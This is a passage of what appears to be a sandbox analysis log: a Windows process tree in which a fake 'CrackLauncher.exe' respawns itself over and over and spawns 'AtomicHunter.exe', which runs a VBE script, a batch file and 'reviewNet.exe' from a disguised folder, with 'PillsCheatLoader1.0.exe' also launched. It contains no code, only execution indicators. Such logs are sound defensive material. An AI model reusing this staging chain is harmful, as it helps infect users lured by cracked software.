C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"76⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"77⤵PID:6940
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"78⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"79⤵PID:6256
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"80⤵PID:5024
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"81⤵PID:3968
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"82⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"83⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"84⤵PID:3140
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"85⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"86⤵PID:4832
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"87⤵PID:5624
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"88⤵PID:5984
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"89⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"90⤵PID:4180
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"91⤵PID:4872
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"92⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"93⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"94⤵PID:2784
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"95⤵PID:2976
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"96⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"97⤵PID:6312
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"98⤵PID:3024
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"99⤵PID:6856
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"100⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"101⤵PID:6932
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"102⤵PID:2364
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"103⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"104⤵PID:5032
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"105⤵PID:1448
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"106⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"107⤵PID:1688
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"108⤵PID:4208
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"109⤵PID:5832
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"110⤵PID:5736
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"111⤵PID:1008
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"112⤵PID:6956
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"113⤵PID:3104
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"114⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"115⤵PID:4268
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"116⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"117⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"118⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"119⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"120⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"121⤵PID:2824
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"122⤵PID:6304
-
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"123⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"124⤵PID:2984
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"125⤵PID:5044
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "126⤵PID:2596
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"127⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"123⤵PID:6860
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"124⤵PID:6336
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "125⤵PID:7440
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"126⤵PID:3832
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"122⤵PID:5504
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"123⤵PID:3356
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "124⤵PID:7404
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"125⤵PID:5132
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"121⤵PID:2984
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"122⤵PID:936
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "123⤵PID:3168
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"124⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"120⤵PID:3492
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"121⤵PID:3316
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "122⤵PID:7944
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"123⤵PID:8060
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"119⤵PID:3404
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"120⤵PID:3376
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "121⤵PID:7952
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"122⤵PID:8032
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"118⤵PID:6020
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"119⤵PID:2164
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "120⤵PID:7968
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"121⤵PID:8040
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"118⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"117⤵PID:2064
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"118⤵PID:2732
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "119⤵PID:7868
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"120⤵PID:7916
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"117⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"116⤵PID:5680
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"117⤵PID:5560
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "118⤵PID:7676
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"119⤵PID:7728
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"116⤵PID:7896
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"115⤵PID:6924
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"116⤵PID:5492
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "117⤵PID:7720
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"118⤵PID:7784
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"115⤵PID:7908
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"114⤵PID:3784
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"115⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "116⤵PID:7520
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"117⤵PID:7564
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"114⤵PID:3936
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"113⤵PID:6476
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"114⤵PID:4568
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "115⤵PID:7448
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"116⤵PID:7488
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"113⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"112⤵PID:2184
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"113⤵PID:3188
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "114⤵PID:7288
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"115⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"112⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"111⤵PID:2448
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"112⤵PID:4988
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "113⤵PID:7260
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"114⤵PID:7332
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"110⤵PID:6872
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"111⤵PID:5596
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "112⤵PID:6512
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"113⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"110⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"109⤵PID:3236
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"110⤵PID:4720
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "111⤵PID:6752
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"112⤵PID:4688
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"109⤵PID:7936
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"108⤵PID:4504
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"109⤵PID:5700
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "110⤵PID:4860
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"111⤵PID:1756
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"108⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"107⤵PID:2556
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"108⤵PID:6128
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "109⤵PID:6604
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"110⤵PID:6128
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"107⤵PID:3316
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"106⤵PID:2248
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"107⤵PID:5220
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "108⤵PID:2692
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"109⤵PID:6984
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"106⤵PID:8000
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"105⤵PID:3752
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"106⤵PID:5044
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "107⤵PID:1884
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"108⤵PID:6240
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"105⤵PID:5644
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"104⤵PID:5516
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"105⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "106⤵PID:5680
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"107⤵PID:2440
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"104⤵PID:4296
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"103⤵PID:6412
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"104⤵PID:6888
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "105⤵PID:5828
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"106⤵PID:3148
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"103⤵PID:3376
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"102⤵PID:4520
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"103⤵PID:288
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "104⤵PID:4976
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"105⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"102⤵PID:2164
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"101⤵PID:3452
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"102⤵PID:6432
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "103⤵PID:6696
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"104⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"101⤵PID:7596
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"100⤵PID:4268
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"101⤵PID:6268
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "102⤵PID:7160
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"103⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"100⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"99⤵PID:2588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"100⤵PID:3868
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "101⤵PID:3708
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"102⤵PID:5696
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"99⤵PID:3008
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"98⤵PID:2832
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"99⤵PID:1080
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "100⤵PID:4212
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"101⤵PID:3616
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"98⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"97⤵PID:3924
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"98⤵PID:4384
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "99⤵PID:6904
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"100⤵PID:3680
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"96⤵PID:2692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"97⤵PID:3204
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "98⤵PID:3292
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"99⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"96⤵PID:1608
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"95⤵PID:952
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"96⤵PID:5696
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "97⤵PID:4840
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"98⤵PID:444
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"95⤵PID:6816
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"94⤵PID:5500
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"95⤵PID:5760
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "96⤵PID:3740
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"97⤵PID:2740
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"94⤵PID:7864
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"93⤵PID:6744
-
